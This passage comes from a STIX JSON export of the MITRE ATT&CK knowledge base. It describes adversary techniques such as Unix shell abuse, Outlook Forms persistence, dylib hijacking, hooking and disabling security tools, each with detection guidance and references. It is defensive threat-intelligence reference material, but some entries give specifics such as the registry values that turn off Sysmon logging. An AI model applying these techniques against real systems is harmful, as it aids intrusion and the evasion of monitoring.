["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-16T12:24:40.163Z", "name": "Unix Shell", "description": "Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.\n\nUnix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Unix shell usage may be common on administrator, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information discovery, collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS", "Linux", "Network"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_remote_support": true, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56", "created": "2020-03-09T14:15:05.330Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1059/004", "external_id": "T1059.004"}, {"source_name": "Apple ZShell", "description": "Apple. (2020, January 28). Use zsh as the default shell on your Mac. Retrieved June 12, 2020.", "url": "https://support.apple.com/HT208050"}, {"source_name": "DieNet Bash", "description": "die.net. (n.d.). bash(1) - Linux man page. Retrieved June 12, 2020.", "url": "https://linux.die.net/man/1/bash"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Outlook Forms", "description": "Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)\n\nOnce malicious forms have been added to the user\u2019s mailbox, they will be loaded when Outlook is started. Malicious forms will execute when an adversary sends a specifically crafted email to the user.(Citation: SensePost Outlook Forms)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)\n\nCollect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Office 365"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator", "User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634", "created": "2019-11-07T20:06:02.624Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1137/003", "external_id": "T1137.003"}, {"source_name": "SensePost Outlook Forms", "description": "Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved February 4, 2019.", "url": "https://sensepost.com/blog/2017/outlook-forms-and-shells/"}, {"source_name": "Microsoft Detect Outlook Forms", "description": "Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook Rules and Custom Forms Injections Attacks in Office 365. Retrieved February 4, 2019.", "url": "https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack"}, {"source_name": "SensePost NotRuler", "description": "SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019.", "url": "https://github.com/sensepost/notruler"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Dylib Hijacking", "description": "macOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. Adversaries can take advantage of ambiguous paths to plant dylibs to gain privilege escalation or persistence.\n\nA common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itself. (Citation: Writing Bad Malware for OSX) (Citation: Malware Persistence on OS X)\n\nIf the program is configured to run at a higher privilege level than the current user, then when the dylib is loaded into the application, the dylib will also run at that elevated level. This can be used by adversaries as a privilege escalation technique.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Objective-See's Dylib Hijacking Scanner can be used to detect potential cases of dylib hijacking. Monitor file systems for moving, renaming, replacing, or modifying dylibs. Changes in the set of dylibs that are loaded by a process (compared to past behavior) that do not correlate with known software, patches, etc., are suspicious. Check the system for multiple dylibs with the same name and monitor which versions have historically been loaded into a process.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.0", "x_mitre_effective_permissions": ["Administrator", "root"], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--aa8bfbc9-78dc-41a4-a03b-7453e0fdccda", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1157", "external_id": "T1157"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/471.html", "external_id": "CAPEC-471"}, {"source_name": "Writing Bad Malware for OSX", "description": "Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017.", "url": "https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf"}, {"source_name": "Malware Persistence on OS X", "description": "Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017.", "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2024-05-13T23:56:48.161Z", "name": "Hooking", "description": "Adversaries may hook into application programming interface (API) functions used by processes to redirect calls for execution and privilege escalation means. Windows processes often leverage these API functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. (Citation: Enterprise ATT&CK)\n\nOne type of hooking seen in ICS involves redirecting calls to these functions via import address table (IAT) hooking. IAT hooking uses modifications to a process IAT, where pointers to imported API functions are stored. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}, {"kill_chain_name": "mitre-ics-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "ics-privesc"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": [], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack", "enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_platforms": ["None"], "x_mitre_version": "1.5", "x_mitre_data_sources": ["Process: OS API Execution"], "x_mitre_effective_permissions": [], "x_mitre_permissions_required": [], "x_mitre_remote_support": false, "x_mitre_system_requirements": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0874", "external_id": "T0874"}, {"source_name": "Enterprise ATT&CK", "description": "Enterprise ATT&CK Hooking Retrieved. 2019/10/27 ", "url": "https://attack.mitre.org/techniques/T1179/"}, {"source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-08T20:13:24.241Z", "name": "Control Device Identification", "description": "Adversaries may perform control device identification to determine the make and model of a target device. Management software and device APIs may be utilized by the adversary to gain this information. By identifying and obtaining device specifics, the adversary may be able to determine device vulnerabilities. This device information can also be used to understand device functionality and inform the decision to target the environment.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": true, "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Field Controller/RTU/PLC/IED"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--abb0a255-eb9c-48d0-8f5c-874bb84c0e45", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-ics-attack", "url": "https://attack.mitre.org/techniques/T0808", "external_id": "T0808"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-04-12T21:13:46.640Z", "name": "Disable or Modify Tools", "description": "Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)\n\nAdversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) \n\nAdversaries may also focus on specific applications such as Sysmon. For example, the \u201cStart\u201d and \u201cEnable\u201d values in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Microsoft-Windows-Sysmon-Operational may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging) \n\nOn network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)(Citation: Analysis of FG-IR-22-369)\n\nIn cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.\n\nFurthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)\n\nAdditionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Gordon Long, Box, Inc., @ethicalhax", "Ziv Karliner, @ziv_kr, Team Nautilus Aqua Security", "Nathaniel Quist, Palo Alto Networks", "Gal Singer, @galsinger29, Team Nautilus Aqua Security", "Daniel Feichter, @VirtualAllocEx, Infosec Tirol", "Cian Heasley", "Alex Soler, AttackIQ", "Sarathkumar Rajendran, Microsoft Defender365", "Lucas Heiligenstein"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor processes and command-line arguments to see if security tools/services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Monitoring for changes to other known features used by deployed security tools may also expose malicious activity.\n\nLack of expected log events may be suspicious.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "macOS", "Linux", "Containers", "IaaS", "Network"], "x_mitre_version": "1.5", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti-virus", "Log analysis", "Signature-based detection", "Host intrusion prevention systems", "File monitoring"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", "created": "2020-02-21T20:32:20.810Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1562/001", "external_id": "T1562.001"}, {"source_name": "Analysis of FG-IR-22-369", "description": " Guillaume Lovet and Alex Kong. (2023, March 9). Analysis of FG-IR-22-369. Retrieved May 15, 2023.", "url": "https://www.fortinet.com/blog/psirt-blogs/fg-ir-22-369-psirt-analysis"}, {"source_name": "Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation", "description": "ALEXANDER MARVI, BRAD SLAYBAUGH, DAN EBREO, TUFAIL AHMED, MUHAMMAD UMAIR, TINA JOHNSON. (2023, March 16). Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation. Retrieved May 15, 2023.", "url": "https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem"}, {"source_name": "OutFlank System Calls", "description": "de Plaa, C. (2019, June 19). Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR. Retrieved September 29, 2021.", "url": "https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/"}, {"source_name": "disable_win_evt_logging", "description": "Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.", "url": "https://ptylu.github.io/content/report/report.html?report=25"}, {"source_name": "chasing_avaddon_ransomware", "description": "Hernandez, A. S. Tarter, P. Ocamp, E. J. (2022, January 19). One Source to Rule Them All: Chasing AVADDON Ransomware. Retrieved January 26, 2022.", "url": "https://www.mandiant.com/resources/chasing-avaddon-ransomware"}, {"source_name": "doppelpaymer_crowdstrike", "description": "Hurley, S. (2021, December 7). Critical Hit: How DoppelPaymer Hunts and Kills Windows Processes. Retrieved January 26, 2022.", "url": "https://www.crowdstrike.com/blog/how-doppelpaymer-hunts-and-kills-windows-processes/"}, {"source_name": "avoslocker_ransomware", "description": "Lakshmanan, R. (2022, May 2). AvosLocker Ransomware Variant Using New Trick to Disable Antivirus Protection. Retrieved May 17, 2022.", "url": "https://thehackernews.com/2022/05/avoslocker-ransomware-variant-using-new.html"}, {"source_name": "dharma_ransomware", "description": "Loui, E. Scheuerman, K. et al. (2020, April 16). Targeted Dharma Ransomware Intrusions Exhibit Consistent Techniques. Retrieved January 26, 2022.", "url": "https://www.crowdstrike.com/blog/targeted-dharma-ransomware-intrusions-exhibit-consistent-techniques/"}, {"source_name": "MDSec System Calls", "description": "MDSec Research. (2020, December). Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams. Retrieved September 29, 2021.", "url": "https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/"}, {"source_name": "SCADAfence_ransomware", "description": "Shaked, O. (2020, January 20). Anatomy of a Targeted Ransomware Attack. Retrieved June 18, 2022.", "url": "https://cdn.logic-control.com/docs/scadafence/Anatomy-Of-A-Targeted-Ransomware-Attack-WP.pdf"}, {"source_name": "demystifying_ryuk", "description": "Tran, T. (2020, November 24). Demystifying Ransomware Attacks Against Microsoft Defender Solution. Retrieved January 26, 2022.", "url": "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/demystifying-ransomware-attacks-against-microsoft-defender/ba-p/1928947"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-02-02T17:18:39.004Z", "name": "Data Manipulation", "description": "Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: Sygnia Elephant Beetle Jan 2022) By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.\n\nThe type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_impact_type": ["Integrity"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ac9e6b22-11bf-45d7-9181-c1cb08360931", "created": "2020-03-02T14:19:22.609Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1565", "external_id": "T1565"}, {"source_name": "Sygnia Elephant Beetle Jan 2022", "description": "Sygnia Incident Response Team. (2022, January 5). TG2003: ELEPHANT BEETLE UNCOVERING AN ORGANIZED FINANCIAL-THEFT OPERATION. Retrieved February 9, 2023.", "url": "https://f.hubspotusercontent30.net/hubfs/8776530/Sygnia-%20Elephant%20Beetle_Jan2022.pdf?__hstc=147695848.3e8f1a482c8f8d4531507747318e660b.1680005306711.1680005306711.1680005306711.1&__hssc=147695848.1.1680005306711&__hsfp=3000179024&hsCtaTracking=189ec409-ae2d-4909-8bf1-62dcdd694372%7Cca91d317-8f10-4a38-9f80-367f551ad64d"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Inter-Process Communication", "description": "Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. \n\nAdversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Linux environments support several different IPC mechanisms, two of which being sockets and pipes.(Citation: Linux IPC) Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) to facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor for strings in files/commands, loaded DLLs/libraries, or spawned processes that are associated with abuse of IPC mechanisms.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "macOS", "Linux"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator", "User", "SYSTEM"], "x_mitre_remote_support": true, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d", "created": "2020-02-12T14:08:48.689Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1559", "external_id": "T1559"}, {"source_name": "Linux IPC", "description": "N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved March 11, 2022.", "url": "https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them."}, {"source_name": "Fireeye Hunting COM June 2019", "description": "Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019.", "url": "https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-02-02T19:04:35.389Z", "name": "Data Obfuscation", "description": "Adversaries may obfuscate command and control traffic to make it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November 2020) Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ad255bfe-a9e6-4b52-a258-8d3462abe842", "created": "2017-05-31T21:30:18.931Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1001", "external_id": "T1001"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}, {"source_name": "Bitdefender FunnyDream Campaign November 2020", "description": "Vrabie, V. (2020, November). Dissecting a Chinese APT Targeting South Eastern Asian Government Institutions. Retrieved September 19, 2022.", "url": "https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-08T20:13:24.241Z", "name": "Program Organization Units", "description": "Program Organizational Units (POUs) are block structures used within PLC programming to create programs and projects. (Citation: Guidance - IEC61131) POUs can be used to hold user programs written in IEC 61131-3 languages: Structured text, Instruction list, Function block, and Ladder logic. (Citation: Guidance - IEC61131) Application - 201203 They can also provide additional functionality, such as establishing connections between the PLC and other devices using TCON. (Citation: PLCBlaster - Spenneberg)\n \nStuxnet uses a simple code-prepending infection technique to infect Organization Blocks (OB). For example, the following sequence of actions is performed when OB1 is infected (Citation: Stuxnet - Symantec - 201102):\n*Increase the size of the original block.\n*Write malicious code to the beginning of the block.\n*Insert the original OB1 code after the malicious code.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "lateral-movement"}, {"kill_chain_name": "mitre-ics-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": true, "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Safety Instrumented System/Protection Relay", "Field Controller/RTU/PLC/IED"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ae62fe1a-ea1a-479b-8dc0-65d250bd8bc7", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-ics-attack", "url": "https://attack.mitre.org/techniques/T0844", "external_id": "T0844"}, {"source_name": "Guidance - IEC61131", "description": "John Karl-Heinz. (n.d.). Programming Industrial Automation Systems. Retrieved October 22, 2019.", "url": "http://www.dee.ufrj.br/controle%20automatico/cursos/IEC61131-3%20Programming%20Industrial%20Automation%20Systems.pdf"}, {"source_name": "PLCBlaster - Spenneberg", "description": "Spenneberg, Ralf, Maik Br\u00fcggemann, and Hendrik Schwartke. (2016, March 31). Plc-blaster: A worm living solely in the plc.. Retrieved September 19, 2017.", "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf"}, {"source_name": "Stuxnet - Symantec - 201102", "description": "Nicolas Falliere, Liam O Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier (Version 1.4). Retrieved September 22, 2017.", "url": "https://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/w32%20stuxnet%20dossier.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-08-11T21:06:07.690Z", "name": "Data from Network Shared Drive", "description": "Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["David Tayouri"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor processes and command-line arguments for actions that could be taken to collect files from a network share. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "x_mitre_system_requirements": ["Privileges to access network shared drive"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--ae676644-d2d2-41b7-af7e-9bed1b55898c", "created": "2017-05-31T21:30:41.022Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1039", "external_id": "T1039"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-04-12T20:19:21.620Z", "name": "Web Services", "description": "Adversaries may compromise access to third-party web services\u00a0that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, SendGrid, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services 